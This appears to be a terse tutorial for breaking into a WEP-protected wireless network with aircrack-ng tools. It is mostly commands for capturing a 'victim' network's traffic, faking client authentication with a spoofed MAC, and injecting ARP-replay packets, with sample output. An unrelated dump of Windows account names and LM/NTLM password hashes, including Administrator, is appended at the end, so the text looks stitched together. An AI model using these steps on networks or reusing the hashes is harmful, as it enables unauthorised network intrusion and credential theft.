PREPARE:

1
2
# airmon-ng start ath0
# airodump-ng –w tmp ath0

ctrl+c, search your “vic­tim”.. copy the bssid of the vic­tim and read the chan­nel, for exam­ple we use chan­nel 1:

DUMP:

1
# airodump-ng –w Neo –c 1 ath0

switch to another shell..

GENERATE TRAFFIC#1 — no host traf­fic
Fake Authen­ti­ca­tion Attack

This attack won’t gen­er­ate any more traf­fic but it does cre­ate an asso­cia­tive client MAC Address use­ful for the above two attacks. Its defi­nately not as good as hav­ing a real, con­nected client, but you gots to do what you gots to do.

This is done eas­i­est with another machine because we need a new MAC address but if you can man­u­ally change your MAC then that’ll work too. We’ll call your new MAC address “Fake MAC”.

Now most APs need clients to reas­so­ci­ate every 30 sec­onds or so or they think they’re dis­con­nected. This is pretty arbi­trary but I use it and it has worked but if your Fake MAC gets dis­con­nected, reas­so­ci­ate quicker. We need both the essid and bssid and our Fake MAC.

1
./aireplay –1 30 –e ‘<ESSID>’ –a <BSSID> –h <Fake MAC> ath0

If suc­cess­ful, you should see some­thing like this:

23:47:29 Send­ing Authen­ti­ca­tion Request
23:47:29 Authen­ti­ca­tion suc­cess­ful
23:47:30 Send­ing Asso­ci­a­tion Request
23:47:30 Asso­ci­a­tion successful :-)

1
aireplay-ng –fakeauth 30 –e …

GENERATE TRAFFIC#2 — host traffic

1
2
# aireplay-ng –arpre­play –b MAC_OF_AP –h CLIENT ath0
# aireplay-ng –inter­ac­tive –a AP_BSSID –h STATION_MAC ath0

Reject any pack­ets with Dest. MAC = FF:FF:FF:FF:FF:FF

1
2
3
4
5
CliAdmIT:500:b38f545135640a39ef37e41421db1c08:c8e1c75818e7fbaac8ade9c1869f7cd6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee::::
L-Install:1000:db0d86e6d977165e0692647ff72b7766:c3e2b0bb54d5e85dc4051b320dc518ef:::
Administrator:1002:b160e39fa3d56ea7d7774daff129ff74:0c304136fab3f94b9a1da07c8aa6856e:::
ASPNET:1003:6f6e2e6c5432b2ab3e290339a04e6d1d:d51d13a9aa736462f60d9f69ff201ae0:::